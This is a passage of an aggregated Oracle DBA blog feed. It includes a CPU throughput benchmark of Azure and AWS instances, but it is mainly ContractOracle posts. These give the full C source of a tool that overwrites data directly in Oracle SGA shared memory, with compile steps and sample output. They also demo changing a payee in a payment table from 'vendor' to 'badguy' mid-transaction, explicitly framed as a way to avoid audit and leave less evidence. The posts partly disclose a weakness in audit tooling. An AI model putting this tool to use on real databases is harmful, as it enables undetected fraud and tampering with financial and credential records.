Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.  I have tested it on Linux against Oracle 12c databases, changing data in SGA without crashing the database, and it should also work against 11g.  It won't work against Oracle versions prior to 11g, as they manage shared memory in a different manner (sample program here).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/mman.h>
#include <sys/stat.h>

void replace_sga(char search_string[], char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        // stop replace_length bytes before the end of the mapping to avoid reading past it
        for (i = 0; i + replace_length <= fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        // release the mapping before moving on to the next segment
        munmap(data, fileInfo.st_size);
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched (verified by flushing the buffer cache and forcing a re-read from disk).


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Installing OEL 6 and Database 12c

Hemant K Chitale - Thu, 2014-07-10 08:25
Here is a collection of posts on installing (a) Virtual Box (b) Oracle Enterprise Linux 6 (c) 12c Grid Infrastructure (Standalone, non-Clustered) and ASM (d) 12c Database with CDB and PDB.
.
.
.

Categories: DBA Blogs

Comparing CPU Throughput of Azure and AWS EC2

Pythian Group - Thu, 2014-07-10 08:11

After observing CPU core sharing with Amazon Web Services EC2, I thought it would be interesting to see if Microsoft Azure platform exhibits the same behavior.

Signing up for Azure’s 30-day trial gives $200 in credit to use over the next 30-day period: more than enough for this kind of testing. I created a new virtual machine using the “quick create” option, with Oracle Linux, choosing a 4-core “A3” standard instance.

I must say I like the machine naming with the built-in “cloudapp.net” DNS that Azure uses: no mucking around with IP addresses. The VM provisioning definitely takes longer than AWS, though no more than a few minutes. And speaking of IP addresses, both start with 191.236. addresses assigned to Microsoft’s Brazilian subsidiary through the Latin American LACNIC registry, due to the lack of North American IP addresses.

Checking out the CPU specs as reported to the OS:

[azureuser@marc-cpu ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

2.2GHz rather than 2.6GHz, but otherwise the same family and architecture as the E5-2670 under AWS. Identified as a single-socket, 4-core processor, without hyperthreads at all.

Running the tests
[azureuser@marc-cpu ~]$ taskset -pc 0 $$
pid 1588's current affinity list: 0-3
pid 1588's new affinity list: 0
[azureuser@marc-cpu ~]$ dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 36.9319 s, 58.8 MB/s
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 72.8379 s, 29.8 MB/s
2170552320 bytes (2.2 GB) copied, 73.6173 s, 29.5 MB/s

Pretty low; that’s half the throughput we saw on AWS, albeit with a slower clock speed here.

[azureuser@marc-cpu ~]$ taskset -pc 0,1 $$
pid 1588's current affinity list: 0
pid 1588's new affinity list: 0,1
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.4285 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.7957 s, 59.0 MB/s

[azureuser@marc-cpu ~]$ taskset -pc 0,2 $$
pid 1588's current affinity list: 0,1
pid 1588's new affinity list: 0,2
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.3998 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.776 s, 59.0 MB/s

Pretty consistent results, so no core sharing, but running considerably slower than we saw with AWS.

Kicking off 20 runs in a row:

[azureuser@marc-cpu ~]$ taskset -pc 0-3 $$
pid 1588's current affinity list: 0,2
pid 1588's new affinity list: 0-3
[azureuser@marc-cpu ~]$ for run in {1..20}; do
>  for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      1 59.1
      4 59.2
      1 59.3
      2 59.4
      2 59.5
      8 59.6
     12 59.7
      7 59.8
      3 59.9

We get very consistent results, between 59.1 and 59.9 MB/s.

Results from “top” while running:

cat > ~/.toprc <<-EOF
RCfile for "top with windows"           # shameless braggin'
Id:a, Mode_altscr=0, Mode_irixps=1, Delay_time=3.000, Curwin=0
Def     fieldscur=AEHIOQTWKNMbcdfgjplrsuvyzX
        winflags=25913, sortindx=10, maxtasks=2
        summclr=1, msgsclr=1, headclr=3, taskclr=1
Job     fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
        winflags=62777, sortindx=0, maxtasks=0
        summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem     fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
        winflags=62777, sortindx=13, maxtasks=0
        summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr     fieldscur=ABDECGfhijlopqrstuvyzMKNWX
        winflags=62777, sortindx=4, maxtasks=0
        summclr=3, msgsclr=3, headclr=2, taskclr=3
EOF
[azureuser@marc-cpu ~]$  top -b -n20 -U azureuser
...
top - 14:38:41 up 2 min,  2 users,  load average: 2.27, 0.78, 0.28
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 95.4%us,  4.6%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu3  :  0.0%us,  0.3%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1606 azureuse  20   0  4292  800  400 R 97.0  0.0   0:03.49 gzip
 1604 azureuse  20   0  4292  796  400 R 96.7  0.0   0:03.50 gzip

top - 14:38:44 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 72.3%us,  3.9%sy,  0.0%ni, 23.4%id,  0.0%wa,  0.0%hi,  0.4%si,  0.0%st
Cpu3  : 12.0%us,  0.7%sy,  0.0%ni, 85.6%id,  1.4%wa,  0.0%hi,  0.4%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.8  0.0   0:06.42 gzip
 1606 azureuse  20   0  4292  800  400 R 96.4  0.0   0:06.40 gzip

top - 14:38:47 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.9%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  9.7%us,  0.3%sy,  0.0%ni, 89.7%id,  0.0%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu2  : 51.8%us,  2.8%sy,  0.0%ni, 45.4%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu3  : 17.9%us,  1.4%sy,  0.0%ni, 80.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.5  0.0   0:09.34 gzip
 1606 azureuse  20   0  4292  800  400 R 95.5  0.0   0:09.29 gzip

It’s using full CPUs and all from gzip, so no large system overhead here. Also, “%st”, the time reported as “stolen” by the hypervisor, is zero. We’re simply getting half the throughput of AWS.

Basic instances

In addition to standard instances, Microsoft makes available basic instances, which claim to offer “similar machine configurations as the Standard tier of instances offered today (Extra Small [A0] to Extra Large [A4]). These instances will cost up to 27% less than the corresponding instances in use today (which will now be called “Standard”) and do not include load balancing or auto-scaling, which are included in Standard” (http://azure.microsoft.com/blog/2014/03/31/microsoft-azure-innovation-quality-and-price/)

Let’s have a look at throughput here, by creating a basic A3 instance “marc-cpu-basic” that otherwise exactly matches the “marc-cpu” instance created earlier.

[azureuser@marc-cpu-basic ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

CPU specs are identical to marc-cpu. Running the same tests:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0 $$
pid 1566's current affinity list: 0-3
pid 1566's new affinity list: 0
[azureuser@marc-cpu-basic ~]$  dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 54.6678 s, 39.7 MB/s
for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu-basic ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 107.73 s, 20.1 MB/s
2170552320 bytes (2.2 GB) copied, 107.846 s, 20.1 MB/s

Now that’s very slow: even with the same stated CPU specs as marc-cpu, marc-cpu-basic comes in with 33% less throughput.

Doing 20 runs in a row:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0-3 $$
pid 1566's current affinity list: 0
pid 1566's new affinity list: 0-3
[azureuser@marc-cpu-basic ~]$ for run in {1..20}; do
> for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu-basic ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      4 40.4
     15 40.5
     14 40.6
      7 40.7

Very consistent results, but consistently slow. They do show that cores aren’t being shared, but throughput is lower than even a shared core under AWS.

Wrapping up

[Comparison chart omitted]

Under this simple gzip test, we are testing CPU integer performance. The Azure standard instance got half the throughput of the equivalent AWS instance, in spite of a clock speed only 15% slower. But the throughput was consistent: no drops when running on adjacent cores. The basic instance was a further 33% slower than the standard instance, in spite of having the same stated CPU configuration.

Under Azure, we simply aren’t getting a full physical core’s worth of throughput. Perhaps the hypervisor is capping throughput, and capping even lower for basic instances? Or maybe the actual CPU is different than the E5-2660 reported? For integer CPU-bound workloads like our gzip test, we would need to purchase at least twice as much capacity under Azure than AWS, making Azure considerably more expensive as a platform.

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 04:42
Vendors sell some rather expensive software for auditing Oracle databases, and coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  
It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.
Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.
PDB1@ORCL> create table payment_batch (payee char(6));
Table created.
PDB1@ORCL> insert into payment_batch values ('vendor');
1 row created.
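(At this point, between the insert and the select below, the replacement program from the companion post would be run from a separate OS session on the database server, along these lines :-)

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy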
PDB1@ORCL> select * from payment_batch;
PAYEE
------
badguy
PDB1@ORCL> commit;
Commit complete.
PDB1@ORCL> alter system flush buffer_cache;
System altered.
PDB1@ORCL> select * from payment_batch;
PAYEE
------
badguy
You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

12c Index Like Table Statistics Collection (Wearing The Inside Out)

Richard Foote - Wed, 2014-07-09 02:14
This change introduced in 12c has caught me out on a number of occasions. If you were to create a new table: And then populate it with a conventional insert: We find there are no statistics associated with the table until we explicitly collect them: But if we were to now create an index on this […]
Categories: DBA Blogs